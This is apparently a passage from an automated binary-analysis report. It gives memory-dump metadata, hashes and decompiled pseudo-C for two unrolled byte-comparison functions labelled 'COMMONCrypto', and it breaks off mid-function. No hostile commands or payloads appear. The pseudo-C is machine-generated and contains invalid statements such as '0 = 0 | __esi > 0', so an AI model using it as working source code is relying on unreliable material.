                                                                                      0x0040e9bf
                                                                                      0x0040e99a
                                                                                      0x0040e99e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e99e
                                                                                      0x0040e979
                                                                                      0x0040e97d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e8d4
                                                                                      0x0040e8d4
                                                                                      0x0040e8d7
                                                                                      0x0040e8db
                                                                                      0x0040e8dd
                                                                                      0x0040e8f4
                                                                                      0x0040e8f4
                                                                                      0x0040e8f8
                                                                                      0x0040e8fc
                                                                                      0x0040e8fe
                                                                                      0x0040e915
                                                                                      0x0040e915
                                                                                      0x0040e919
                                                                                      0x0040e91d
                                                                                      0x0040e91f
                                                                                      0x0040e936
                                                                                      0x0040e936
                                                                                      0x0040e93a
                                                                                      0x0040e93e
                                                                                      0x0040e940
                                                                                      0x0040e946
                                                                                      0x0040e949
                                                                                      0x0040e94d
                                                                                      0x0040e94d
                                                                                      0x00000000
                                                                                      0x0040e940
                                                                                      0x0040e925
                                                                                      0x0040e928
                                                                                      0x0040e92c
                                                                                      0x0040e930
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e930
                                                                                      0x0040e904
                                                                                      0x0040e907
                                                                                      0x0040e90b
                                                                                      0x0040e90f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e90f
                                                                                      0x0040e8e3
                                                                                      0x0040e8e6
                                                                                      0x0040e8ea
                                                                                      0x0040e8ee
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e8ee
                                                                                      0x0040e0e5
                                                                                      0x0040e0e5
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                      • Instruction ID: 14dc86b262c0698d49564d17bd060922aedc175ec51bf9ad3ac027b1749105e3
                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                      • Instruction Fuzzy Hash: 47D18B73D0A9B30AC735852E446822BEA626FD174431ECBF29CD43F3C9963B5D2096D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E4C0, Relevance: .4, Instructions: 361COMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040E4C0(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                                                                                      0x0040e4c0
                                                                                      0x0040e4c0
                                                                                      0x0040e4c6
                                                                                      0x0040e545
                                                                                      0x0040e547
                                                                                      0x0040e549
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e54f
                                                                                      0x0040e555
                                                                                      0x0040e5d4
                                                                                      0x0040e5d6
                                                                                      0x0040e5d8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e5de
                                                                                      0x0040e5e4
                                                                                      0x0040e663
                                                                                      0x0040e665
                                                                                      0x0040e667
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e66d
                                                                                      0x0040e673
                                                                                      0x0040e6f2
                                                                                      0x0040e6f4
                                                                                      0x0040e6f6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e6fc
                                                                                      0x0040e702
                                                                                      0x0040e781
                                                                                      0x0040e783
                                                                                      0x0040e785
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e791
                                                                                      0x0040e811
                                                                                      0x0040e813
                                                                                      0x0040e815
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e81b
                                                                                      0x0040e821
                                                                                      0x0040e8a0
                                                                                      0x0040e8a2
                                                                                      0x0040e8a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e8b2
                                                                                      0x0040e8b4
                                                                                      0x0040e8c5
                                                                                      0x0040e8c5
                                                                                      0x0040e4ba
                                                                                      0x0040f216
                                                                                      0x0040f216
                                                                                      0x0040e82a
                                                                                      0x0040e82c
                                                                                      0x0040e843
                                                                                      0x0040e84b
                                                                                      0x0040e84d
                                                                                      0x0040e864
                                                                                      0x0040e86c
                                                                                      0x0040e86e
                                                                                      0x0040e885
                                                                                      0x0040e88d
                                                                                      0x0040e88f
                                                                                      0x0040e89c
                                                                                      0x0040e89c
                                                                                      0x00000000
                                                                                      0x0040e88f
                                                                                      0x0040e87b
                                                                                      0x0040e87f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e87f
                                                                                      0x0040e85a
                                                                                      0x0040e85e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e85e
                                                                                      0x0040e839
                                                                                      0x0040e83d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e83d
                                                                                      0x0040e79b
                                                                                      0x0040e79d
                                                                                      0x0040e7b4
                                                                                      0x0040e7bc
                                                                                      0x0040e7be
                                                                                      0x0040e7d5
                                                                                      0x0040e7dd
                                                                                      0x0040e7df
                                                                                      0x0040e7f6
                                                                                      0x0040e7fe
                                                                                      0x0040e800
                                                                                      0x0040e80d
                                                                                      0x0040e80d
                                                                                      0x00000000
                                                                                      0x0040e800
                                                                                      0x0040e7ec
                                                                                      0x0040e7f0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e7f0
                                                                                      0x0040e7cb
                                                                                      0x0040e7cf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e7cf
                                                                                      0x0040e7aa
                                                                                      0x0040e7ae
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e7ae
                                                                                      0x0040e70b
                                                                                      0x0040e70d
                                                                                      0x0040e724
                                                                                      0x0040e72c
                                                                                      0x0040e72e
                                                                                      0x0040e745
                                                                                      0x0040e74d
                                                                                      0x0040e74f
                                                                                      0x0040e766
                                                                                      0x0040e76e
                                                                                      0x0040e770
                                                                                      0x0040e77d
                                                                                      0x0040e77d
                                                                                      0x00000000
                                                                                      0x0040e770
                                                                                      0x0040e75c
                                                                                      0x0040e760
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e760
                                                                                      0x0040e73b
                                                                                      0x0040e73f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e73f
                                                                                      0x0040e71a
                                                                                      0x0040e71e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e71e
                                                                                      0x0040e67c
                                                                                      0x0040e67e
                                                                                      0x0040e695
                                                                                      0x0040e69d
                                                                                      0x0040e69f
                                                                                      0x0040e6b6
                                                                                      0x0040e6be
                                                                                      0x0040e6c0
                                                                                      0x0040e6d7
                                                                                      0x0040e6df
                                                                                      0x0040e6e1
                                                                                      0x0040e6ee
                                                                                      0x0040e6ee
                                                                                      0x00000000
                                                                                      0x0040e6e1
                                                                                      0x0040e6cd
                                                                                      0x0040e6d1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e6d1
                                                                                      0x0040e6ac
                                                                                      0x0040e6b0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e6b0
                                                                                      0x0040e68b
                                                                                      0x0040e68f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e68f
                                                                                      0x0040e5ed
                                                                                      0x0040e5ef
                                                                                      0x0040e606
                                                                                      0x0040e60e
                                                                                      0x0040e610
                                                                                      0x0040e627
                                                                                      0x0040e62f
                                                                                      0x0040e631
                                                                                      0x0040e648
                                                                                      0x0040e650
                                                                                      0x0040e652
                                                                                      0x0040e65f
                                                                                      0x0040e65f
                                                                                      0x00000000
                                                                                      0x0040e652
                                                                                      0x0040e63e
                                                                                      0x0040e642
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e642
                                                                                      0x0040e61d
                                                                                      0x0040e621
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e621
                                                                                      0x0040e5fc
                                                                                      0x0040e600
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e600
                                                                                      0x0040e55e
                                                                                      0x0040e560
                                                                                      0x0040e577
                                                                                      0x0040e57f
                                                                                      0x0040e581
                                                                                      0x0040e598
                                                                                      0x0040e5a0
                                                                                      0x0040e5a2
                                                                                      0x0040e5b9
                                                                                      0x0040e5c1
                                                                                      0x0040e5c3
                                                                                      0x0040e5d0
                                                                                      0x0040e5d0
                                                                                      0x00000000
                                                                                      0x0040e5c3
                                                                                      0x0040e5af
                                                                                      0x0040e5b3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e5b3
                                                                                      0x0040e58e
                                                                                      0x0040e592
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e592
                                                                                      0x0040e56d
                                                                                      0x0040e571
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e4c8
                                                                                      0x0040e4c8
                                                                                      0x0040e4cb
                                                                                      0x0040e4cf
                                                                                      0x0040e4d1
                                                                                      0x0040e4e8
                                                                                      0x0040e4e8
                                                                                      0x0040e4ec
                                                                                      0x0040e4f0
                                                                                      0x0040e4f2
                                                                                      0x0040e509
                                                                                      0x0040e509
                                                                                      0x0040e50d
                                                                                      0x0040e511
                                                                                      0x0040e513
                                                                                      0x0040e52a
                                                                                      0x0040e52a
                                                                                      0x0040e52e
                                                                                      0x0040e532
                                                                                      0x0040e534
                                                                                      0x0040e53a
                                                                                      0x0040e53d
                                                                                      0x0040e541
                                                                                      0x0040e541
                                                                                      0x00000000
                                                                                      0x0040e534
                                                                                      0x0040e519
                                                                                      0x0040e51c
                                                                                      0x0040e520
                                                                                      0x0040e524
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e524
                                                                                      0x0040e4f8
                                                                                      0x0040e4fb
                                                                                      0x0040e4ff
                                                                                      0x0040e503
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e503
                                                                                      0x0040e4d7
                                                                                      0x0040e4da
                                                                                      0x0040e4de
                                                                                      0x0040e4e2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e4e2
                                                                                      0x0040e0e5
                                                                                      0x0040e0e5
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                      • Instruction ID: 0843b29f35714b48bc86719b859723769e1f0d5a59cc2da2080ade0b7aa39ad3
                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                      • Instruction Fuzzy Hash: E8C16B73C0A9B30AC736852E446812BEA626FD175431ECBF29CD43F3C9967B5C2195D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E0EC, Relevance: .4, Instructions: 351COMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040E0EC(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
